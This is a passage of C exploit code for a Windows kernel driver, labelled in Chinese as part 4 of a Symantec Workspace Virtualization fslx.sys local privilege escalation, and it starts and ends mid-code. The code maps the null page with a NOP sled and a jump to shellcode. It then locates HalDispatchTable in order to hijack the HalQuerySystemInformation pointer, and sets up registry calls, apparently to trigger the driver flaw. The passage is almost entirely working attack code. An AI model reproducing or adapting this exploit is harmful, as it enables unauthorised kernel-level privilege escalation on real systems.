if (status !=0)
{
printf("err alloc vm %08x\n", status);
getchar();
return 0 ;
}
//result length always <=0x800
//0~0x800: NOP
//0x800: shell code
memset((PVOID)0x0 , 0x90 , 0x1000);
*(BYTE*)((ULONG)0x800) = 0xe9 ;
*(ULONG*)((ULONG)0x801) = (ULONG)InbvShellCode - (ULONG)0x800 - 0x5 ;
//get haldispatchtable
HMODULE hntos = LoadLibrary(strrchr(pinfo->Module[0].ImageName , '\\')+1);
if (hntos == 0 )
{
printf("cannot load ntos\n");
getchar();
return 0 ;
}
PVOID pHalDispatchTable = GetProcAddress(hntos , "HalDispatchTable");
pHalDispatchTable = (PVOID)((ULONG)pHalDispatchTable - (ULONG)hntos);
pHalDispatchTable = (PVOID)((ULONG)pHalDispatchTable + (ULONG)pinfo->Module[0].Base);
PVOID xHalQuerySystemInformationAddr = (PVOID)((ULONG)pHalDispatchTable+ sizeof(ULONG));
FreeLibrary(hntos);
HKEY hkey ;
ULONG err = RegOpenKeyEx(HKEY_CURRENT_USER , "Software" , 0 , KEY_READ , &hkey);
if (err!=ERROR_SUCCESS)
{
printf("open key read failed %u\n" ,err);
getchar();
return 0 ;
}
HKEY hkey2 ;
err = RegOpenKeyEx(HKEY_CURRENT_USER , "Software" , 0 , KEY_WRITE , &hkey2);
if (err != ERROR_SUCCESS)
{
printf("open key write failed %u\n", err);
getchar();
return 0 ;
}
DWORD dd ;
err = RegSetValueEx(hkey2 , "123" , 0 , REG_DWORD , (CONST BYTE*)&dd , sizeof(DWORD));
if (err != ERROR_SUCCESS)
{
printf("set value %u\n" , err);
getchar();
return 0 ;
} BYTE buffer[100];
PVOID pbuf = buffer ;
Symantec Workspace Virtualization 'fslx.sys'本地权限提升漏(4)
内容版权声明:除非注明,否则皆为本站原创文章。